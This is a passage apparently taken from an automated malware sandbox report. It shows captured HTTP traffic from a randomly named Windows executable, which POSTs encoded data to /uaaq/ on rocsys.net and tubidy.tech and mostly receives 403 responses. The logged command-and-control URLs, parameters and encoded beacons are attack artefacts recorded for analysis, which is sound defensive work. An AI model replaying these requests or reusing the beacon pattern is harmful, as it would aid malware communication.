                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 74 49 4e 49 45 37 52 78 4a 34 2f 30 68 45 73 46 37 4a 31 50 62 55 6b 61 4a 37 63 78 57 4b 54 46 49 49 6a 47 79 67 32 57 70 7a 2f 57 48 64 6c 75 4b 6a 42 48 2b 39 73 38 63 6e 5a 7a 33 71 4a 52 75 30 33 44 6d 45 37 2b 63 72 4a 58 57 53 6b 51 75 67 2f 6c 31 70 61 7a 5a 74 48 54 2b 44 63 63 34 2f 56 7a 49 35 2b 52 33 53 48 54 44 31 71 38 64 58 64 76 78 4c 44 6f 6b 70 71 2f 4b 6f 4d 2f 39 58 66 68 65 42 4a 39 46 69 4d 4d 78 32 56 30 6b 6f 6b 42 53 44 59 6a 79 74 67 46 59 42 7a 32 6e 6d 2f 4e 52 36 70 6a 50 65 32 6d 6a 61 35 77 51 3d 3d
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/0hEsF7J1PbUkaJ7cxWKTFIIjGyg2Wpz/WHdluKjBH+9s8cnZz3qJRu03DmE7+crJXWSkQug/l1pazZtHT+Dcc4/VzI5+R3SHTD1q8dXdvxLDokpq/KoM/9XfheBJ9FiMMx2V0kokBSDYjytgFYBz2nm/NR6pjPe2mja5wQ==
                                                                                    Dec 4, 2023 12:08:55.437577009 CET242INHTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    63192.168.11.304982337.97.254.27803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:57.964075089 CET706OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 74 49 4e 49 45 37 52 78 4a 34 2f 31 42 55 73 57 71 4a 31 48 62 55 6e 47 35 37 63 2b 32 4b 58 46 49 4d 6a 47 7a 31 37 57 62 6e 2f 57 6e 4e 6c 76 49 62 42 47 2b 39 73 30 38 6e 63 33 33 71 53 52 75 35 4b 44 6a 45 37 2b 63 2f 4a 58 58 69 6b 52 63 49 38 6b 6c 70 59 38 35 74 2f 4d 75 44 63 63 34 2f 56 7a 4d 51 70 52 33 61 48 54 32 39 71 2b 2f 76 65 69 52 4c 4d 2f 55 70 71 75 36 6f 41 2f 39 58 48 68 66 63 53 39 47 61 4d 4d 77 47 56 30 31 6f 6a 50 53 44 61 2b 69 73 78 4b 6f 42 35 38 46 72 6c 4a 44 2b 2f 36 4d 4c 36 71 57 32 71 33 6a 72 68 56 71 49 41 68 74 50 6e 4c 37 53 51 59 4a 4a 4c 6a 44 4d 3d
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/1BUsWqJ1HbUnG57c+2KXFIMjGz17Wbn/WnNlvIbBG+9s08nc33qSRu5KDjE7+c/JXXikRcI8klpY85t/MuDcc4/VzMQpR3aHT29q+/veiRLM/Upqu6oA/9XHhfcS9GaMMwGV01ojPSDa+isxKoB58FrlJD+/6ML6qW2q3jrhVqIAhtPnL7SQYJJLjDM=
                                                                                    Dec 4, 2023 12:08:58.131747007 CET242INHTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    64192.168.11.304982437.97.254.27803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:00.652368069 CET1623OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 55 74 49 4e 49 45 37 52 78 4a 34 2f 31 42 55 73 57 71 4a 31 48 62 55 6e 47 35 37 63 2b 32 4b 58 46 49 4d 6a 47 7a 31 37 57 62 2f 2f 57 55 31 6c 74 70 62 42 46 2b 39 73 36 63 6e 64 33 33 72 49 52 75 68 47 44 6a 42 5a 2b 59 50 4a 57 78 32 6b 41 59 63 38 74 6c 70 59 6b 4a 74 45 54 2b 44 46 63 34 76 76 7a 49 38 70 52 33 61 48 54 78 4e 71 35 74 58 65 67 52 4c 44 6f 6b 6f 72 2f 4b 70 58 2f 38 2f 58 68 66 5a 6e 39 32 36 4d 4d 51 57 56 32 48 51 6a 48 53 44 55 39 69 73 70 4b 6f 4d 6a 38 46 6d 55 4a 44 6d 5a 36 50 62 36 6e 42 47 31 6b 68 62 59 50 38 51 52 75 39 48 4d 4b 2b 75 74 42 4d 4e 50 30 6e 71 33 50 64 49 7a 73 39 47 2f 75 6b 74 79 75 6f 7a 57 51 47 49 68 69 47 6c 7a 41 67 32 66 41 61 71 58 49 6d 66 2f 61 35 57 61 72 68 2f 43 4a 52 4f 6a 31 42 4f 71 50 75 41 46 59 43 74 68 36 47 61 34 56 74 64 77 78 4d 6e 37 42 50 50 2b 54 58 4d 71 63 4e 37 43 56 5a 4f 5a 47 44 6b 74 7a 41 4b 30 53 4f 59 71 49 42 4e 77 71 5a 45 68 41 44 4e 46 4f 48 47 31 46 34 52 72 6e 37 61 6f 4f 79 6f 2f 76 50 2b 45 43 6c 6b 78 55 50 62 44 68 33 57 68 44 49 38 6e 54 79 4b 50 2f 68 78 78 43 50 68 75 6b 50 56 30 70 79 61 58 70 52 6b 6d 59 6c 33 39 49 70 6a 30 4a 79 52 6e 76 49 2f 35 46 34 58 5a 68 35 44 78 44 47 65 56 65 2f 59 42 62 32 72 69 37 6f 5a 38 6c 2f 57 43 74 68 35 2b 2f 59 66 4f 46 59 71 63 55 58 64 44 6d 6f 2b 55 4c 71 69 73 30 7a 56 61 63 76 31 69 7a 6c 46 65 31 30 4e 4a 57 67 62 7a 4d 51 49 6a 33 77 61 6f 51 37 66 6c 36 74 4d 51 4f 62 55 6d 46 30 78 5a 70 45 74 6a 6f 6e 78 53 76 6d 64 34 56 75 66 64 6b 50 33 72 32 34 61 44 54 58 58 2f 65 6f 6f 64 4a 42 77 64 42 38 73 4c 6e 4a 73 42 6b 5a 34 36 36 61 49 63 6e 59 30 42 4d 32 6f 37 37 39 4a 53 71 52 39 4f 4c 61 61 69 71 45 5a 76 79 74 74 4b 4d 6d 6c 37 49 74 41 37 4a 6f 41 48 49 7a 6b 56 77 48 35 78 6e 73 2b 77 49 4b 58 39 42 35 41 36 54 70 41 39 66 44 51 41 55 2b 37 46 59 36 75 73 79 75 58 74 45 66 6e 64 58 4c 46 6d 6e 41 42 4d 67 55 53 69 72 68 66 64 44 35 52 79 62 57 2b 68 63 49 63 75 65 38 79 49 72 5a 74 4a 6b 32 78 56 77 4d 52 6d 2b 43 4c 77 47 48 2b 42 63 5a 4c 70 67 6e 76 61 35 4e 73 37 72 62 4d 54 6f 47 77 5a 41 46 72 36 30 57 6b 37 2b 34 77 67 43 46 66 7a 59 37 49 45 39 31 30 65 50 71 44 44 44 36 73 6b 55 4d 53 6f 61 79 45 66 57 32 68 54 58 72 6c 39 71 49 76 56 61 31 37 49 59 4b 6b 73 52 4c 45 6c 30 36 48 52 38 44 6a 44 46 74 75 76 35 76 42 63 66 33 44 58 36 77 6b 69 66 52 57 49 31 64 30 74 65 2f 2f 2f 72 41 58 37 78 67 54 7a 6c 56 47 2f 39 4c 6e 43 36 50 2f 4c 58 50 7a 6c 50 53 31 41 44 56 2b 57 4b 58 68 48 65 57 72 4d 63 46 42 57 76 6c 65 62 2f 63 6d 76 66 51 53 6f 57 43 58 65 44 4d 4e 5a 74 46 75 39 71 37 79 38 47 4a 71 54 4e 4c 79 69 78 33 6b 64 59 41 47 38 5a 7a 77 39 47 43 39 49 4b 2f 74 51 43 6a 48 51 77 73 34 52 37 68 52 59 4c 77 78 74 6f 52 78 67 53 6a 4e 58 2b 32 30 4e 64 4a 58 35 4a 6d 53 30 2b 7a 51 58 6b 65 4f 54 54 6a 76 77 34 79 42 68 46 54 75 52 2b 69 57 67 71 45 61 4b 65 62 58 46 2f 50 48 6d 44 59 64 53 68 4d 61 2b 62 4f 2b 2f 48 71 48 6d 42 71 6b 65 66 37 39 58 45 67 57 41 2b 33 45 38 48 38 74 4b 2b 52 54 65 74 75 34 4c 6e 44 4f 4b 56 57 34 72 70 51 39 33 67 45 4e 64 2b 39 6c 56 67 7a 68 73 43 38 65 51 37 71 69 6b 55 53 69 6a 79 6e 74 31 79 74 76 77 30 73 75 4e 62 4d 77 4f 4e 43 49 44 55 4d 70 61 6f 52 4e 75 67 6c 66 32 4f 56 77 78 4d 4f 32 74 41 4a 6e 5a 63 7a 65 32 79 6c 69 57 7a 37 71 4e 66 74 78 65 54 6a 76 36 36 43 38 4a 39 4b 2b 45
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/1BUsWqJ1HbUnG57c+2KXFIMjGz17Wb//WU1ltpbBF+9s6cnd33rIRuhGDjBZ+YPJWx2kAYc8tlpYkJtET+DFc4vvzI8pR3aHTxNq5tXegRLDokor/KpX/8/XhfZn926MMQWV2HQjHSDU9ispKoMj8FmUJDmZ6Pb6nBG1khbYP8QRu9HMK+utBMNP0nq3PdIzs9G/uktyuozWQGIhiGlzAg2fAaqXImf/a5Warh/CJROj1BOqPuAFYCth6Ga4VtdwxMn7BPP+TXMqcN7CVZOZGDktzAK0SOYqIBNwqZEhADNFOHG1F4Rrn7aoOyo/vP+EClkxUPbDh3WhDI8nTyKP/hxxCPhukPV0pyaXpRkmYl39Ipj0JyRnvI/5F4XZh5DxDGeVe/YBb2ri7oZ8l/WCth5+/YfOFYqcUXdDmo+ULqis0zVacv1izlFe10NJWgbzMQIj3waoQ7fl6tMQObUmF0xZpEtjonxSvmd4VufdkP3r24aDTXX/eoodJBwdB8sLnJsBkZ466aIcnY0BM2o779JSqR9OLaaiqEZvyttKMml7ItA7JoAHIzkVwH5xns+wIKX9B5A6TpA9fDQAU+7FY6usyuXtEfndXLFmnABMgUSirhfdD5RybW+hcIcue8yIrZtJk2xVwMRm+CLwGH+BcZLpgnva5Ns7rbMToGwZAFr60Wk7+4wgCFfzY7IE910ePqDDD6skUMSoayEfW2hTXrl9qIvVa17IYKksRLEl06HR8DjDFtuv5vBcf3DX6wkifRWI1d0te///rAX7xgTzlVG/9LnC6P/LXPzlPS1ADV+WKXhHeWrMcFBWvleb/cmvfQSoWCXeDMNZtFu9q7y8GJqTNLyix3kdYAG8Zzw9GC9IK/tQCjHQws4R7hRYLwxtoRxgSjNX+20NdJX5JmS0+zQXkeOTTjvw4yBhFTuR+iWgqEaKebXF/PHmDYdShMa+bO+/HqHmBqkef79XEgWA+3E8H8tK+RTetu4LnDOKVW4rpQ93gENd+9lVgzhsC8eQ7qikUSijynt1ytvw0suNbMwONCIDUMpaoRNuglf2OVwxMO2tAJnZcze2yliWz7qNftxeTjv66C8J9K+E
                                                                                    Dec 4, 2023 12:09:00.822199106 CET242INHTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    65192.168.11.304982537.97.254.27803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:03.346555948 CET422OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA== HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:09:03.524601936 CET1340INHTTP/1.1 200 OK
                                                                                    Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Type: text/html
                                                                                    Cache-Control: max-age=31536000
                                                                                    X-Varnish: 1066635694 3
                                                                                    Age: 19003342
                                                                                    Via: 1.1 varnish (Varnish/6.1)
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 64668
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 61 73 63 69 69 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 49 50 20 2d 20 52 65 73 65 72 76 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 53 6f 75 72 63 65 2b 53 61 6e 73 2b 50 72 6f 3a 34 30 30 2c 39 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 72 65 73 65 72 76 65 64 2e 74 72 61 6e 73 69 70 2e 6e 6c 2f 61 73 73 65 74 73 2f 63 73 73 2f 63 6f 6d 62 69 6e 65 64 2d 6d 69 6e 2e 63 73 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 42 65 7a 65 74 21 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 36 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 6c 65 66 74 20 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">
                                                                                    Dec 4, 2023 12:09:03.524754047 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 69 70 2e 6e 6c 2f 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 6e 6c 22 20 72 65 6c
                                                                                    Data Ascii: <a href="https://transip.nl/" class="reserved-nav-brand-link lang_nl" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space
                                                                                    Dec 4, 2023 12:09:03.524852991 CET1340INData Raw: 63 2d 32 2c 30 2d 33 2e 35 2c 30 2e 31 2d 34 2e 36 2c 30 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e
                                                                                    Data Ascii: c-2,0-3.5,0.1-4.6,0.5 c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/>
                                                                                    Dec 4, 2023 12:09:03.524914026 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: /> <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g>
                                                                                    Dec 4, 2023 12:09:03.524970055 CET1340INData Raw: 65 72 76 65 64 2d 6e 61 76 2d 62 72 61 6e 64 2d 6c 69 6e 6b 20 6c 61 6e 67 5f 65 6e 20 68 69 64 64 65 6e 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20
                                                                                    Data Ascii: erved-nav-brand-link lang_en hidden" rel="nofollow"> <svg version="1.1" id="transip-logo" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <
                                                                                    Dec 4, 2023 12:09:03.525023937 CET1340INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 2d 31 2e 31 2c 30 2e 34 2d 31 2e 37 2c 31 2e 33 2d 31 2e 37 2c 32 2e 38 76 30 2e 38 63 30 2c 31 2e 32 2c 30 2e 32 2c 32 2e 31 30 32 2c 30 2e 39 2c 32 2e 38 30 31 63 30 2e 37 2c 30 2e 36 39 39 2c 31 2e 38 2c
                                                                                    Data Ascii: c-1.1,0.4-1.7,1.3-1.7,2.8v0.8c0,1.2,0.2,2.102,0.9,2.801c0.7,0.699,1.8,1,3.6,1h5.4c2.9,0,4-0.199,4.6-1v0.801h2.7V8.8 C50.7,5,47.6,4.5,43.4,4.5z"/> <path class="transip-logo
                                                                                    Dec 4, 2023 12:09:03.525079012 CET1340INData Raw: 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: <g> <g> <rect class="transip-logo-part" x="96.5" fill="#187DC1" width="2.7" height="2.2"/> </g> </g>
                                                                                    Dec 4, 2023 12:09:03.525136948 CET1340INData Raw: 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 73 77 69 74 63 68 4c 61 6e 67 75 61 67 65 28 27 6e 6c 27 29 22 20 63 6c 61 73 73 3d 22 72 65 73 65 72 76 65 64 2d 6e 61 76 2d 66 6c 61 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: a href="javascript:switchLanguage('nl')" class="reserved-nav-flag"> <svg class="flag-icon" xmlns="http://www.w3.org/2000/svg" height="15" width="20" viewBox="0 0 640 480" version="1"><g fill-rule="evenodd" stroke-width=
                                                                                    Dec 4, 2023 12:09:03.525192022 CET1340INData Raw: 30 31 68 31 30 32 2e 34 56 30 68 2d 31 30 32 2e 34 7a 4d 2d 32 35 36 20 35 31 32 2e 30 31 4c 38 35 2e 33 34 20 33 34 31 2e 33 34 68 37 36 2e 33 32 34 6c 2d 33 34 31 2e 33 34 20 31 37 30 2e 36 37 48 2d 32 35 36 7a 4d 2d 32 35 36 20 30 4c 38 35 2e
                                                                                    Data Ascii: 01h102.4V0h-102.4zM-256 512.01L85.34 341.34h76.324l-341.34 170.67H-256zM-256 0L85.34 170.67H9.016L-256 38.164V0zm606.356 170.67L691.696 0h76.324L426.68 170.67h-76.324zM768.02 512.01L426.68 341.34h76.324L768.02 473.848v38.162z" fill="#c00"/></g
                                                                                    Dec 4, 2023 12:09:03.525248051 CET1340INData Raw: 37 2c 32 35 2e 35 2d 35 37 2c 35 37 73 32 35 2e 35 2c 35 37 2c 35 37 2c 35 37 73 35 37 2d 32 35 2e 35 2c 35 37 2d 35 37 53 31 33 31 2e 34 2c 34 34 2c 39 39 2e 39 2c 34 34 7a 20 4d 31 33 33 2e 34 2c 31 34 31 2e 33 0a 20 20 20 20 20 20 20 20 20 20
                                                                                    Data Ascii: 7,25.5-57,57s25.5,57,57,57s57-25.5,57-57S131.4,44,99.9,44z M133.4,141.3 c-3.7-1.8-15.9-4.2-18.8-6.1c-3.4-2.1-2.3-13.7-2.3-13.7l2.3-2c0,0,0.6-5.2,1.6-7.1c2.2-4.3,4.6-11.4,4.6-11.4s2.3-1.7,2.3-
                                                                                    Dec 4, 2023 12:09:03.701335907 CET1340INData Raw: 20 20 20 20 20 20 20 20 6c 32 2e 35 2d 32 2e 35 63 30 2c 30 2c 30 2e 31 2c 30 2c 30 2e 31 2d 30 2e 31 63 30 2c 30 2c 30 2e 31 2d 30 2e 31 2c 30 2e 31 2d 30 2e 31 63 32 2e 39 2d 33 2c 33 2e 31 2d 37 2e 37 2c 30 2e 35 2d 31 30 2e 39 6c 30 2e 31 2c
                                                                                    Data Ascii: l2.5-2.5c0,0,0.1,0,0.1-0.1c0,0,0.1-0.1,0.1-0.1c2.9-3,3.1-7.7,0.5-10.9l0.1,0c-1.9-2.3-3.9-4.5-6-6.6c-2.2-2.2-4.4-4.2-6.8-6.2 l0,0c-2.9-2.4-7-2.4-10-0.3l-1.8,1.8l-1.7,1.7l-0.1-0.1c-3.6,3.6-8.8,


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    66192.168.11.3049826146.148.34.125803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:09:09.008347988 CET689OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
